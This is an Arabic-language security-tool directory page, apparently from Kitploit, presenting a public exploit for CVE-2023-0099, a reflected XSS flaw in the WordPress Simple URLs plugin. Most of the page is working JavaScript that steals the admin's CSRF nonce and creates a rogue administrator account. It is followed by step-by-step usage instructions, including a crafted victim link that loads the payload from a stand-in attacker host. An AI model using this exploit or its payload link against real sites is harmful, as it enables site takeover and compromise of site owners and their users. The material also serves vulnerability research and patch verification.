Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-0099-exploit — روابط بسيطة < 115 - XSS المنعكسة | Kitploit
أدوات/GitHubGitHub/amirzargham/cve-2023-0099-exploit
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubamirzargham/cve-2023-0099-exploit

CVE-2023-0099-exploit

روابط بسيطة < 115 - XSS المنعكسة

عرض المستودع
61منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-0099-exploit

عنوان الاستغلال: simple urls < 115 - Reflected XSS

Google Dork:

مؤلف الاستغلال: AmirZargham

الصفحة الرئيسية للبائع: https://getlasso.co/

رابط البرنامج: https://wordpress.org/plugins/simple-urls/

الإصدار: < 115

تم الاختبار على: firefox,chrome

CVE: CVE-2023-0099

CWE: CWE-79

المنصة: MULTIPLE

النوع: WebApps

الوصف إضافة Simple URLs الخاصة بووردبريس قبل الإصدار 115 لا تقوم بتعقيم وهروب بعض المعاملات قبل إخراجها مرة أخرى في بعض الصفحات، مما يؤدي إلى ثغرة Cross-Site Scripting الانعكاسية والتي يمكن استخدامها ضد المستخدمين ذوي الامتيازات العالية مثل المسؤول.

الاستغلال:

root@kitploit:~
function getCSRFToken(url, csrf_token_id, func){
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){
if(this.readyState == 4 && this.status == 200){
var parser = new DOMParser();
var htmlDocument = parser.parseFromString(this.responseText, "text/html");
var token = htmlDocument.getElementById(csrf_token_id).value;
func(token);
}

};
xhr.open("GET", url, true);
xhr.withCredentials = true;
xhr.send();

}

function addAdmin(token){
var xhr = new XMLHttpRequest();
xhr.open("POST","http://vulnerable.site/wp-admin/user-new.php", true);
xhr.withCredentials = true;
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("action=createuser&_wpnonce_create-user=" + token + "&_wp_http_referer=%2Fwp-admin%2Fuser-new.php&user_login=hack-admin&[email protected]&first_name=&last_name=&url=&pass1=1234&pass2=1234&pw_weak=on&send_user_notification=1&role=administrator&createuser=Add+New+User");
}

getCSRFToken("http://vulnerable.site/wp-admin/user-new.php", "_wpnonce_create-user", addAdmin);

معلومات الاستخدام:

  1. احفظ كود الاستغلال في ملف جافاسكربت على الخادم.
  2. في ملف الاستغلال غيّر القيم:
    • user_login: اسم مستخدم عشوائي
    • pass1: كلمة مرور عشوائية
    • pass2: كلمة مرور عشوائية
    • email: بريد إلكتروني عشوائي
  3. الآن أرسل الرابط الخبيث للضحية: https://vulnerable.com/wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=</script><script src="https://attacker.com/exploit.js"></script>
  4. بعد معرفة أنه تم إنشاء مستخدم Admin، اذهب إلى /wp-admin أو ما شابه، وسجل الدخول إلى لوحة تحكم ووردبريس.

نُشر في: exploit-db.

نُشر في: 0day.today.

نُشر في: packet storm.

تنزيل الأداة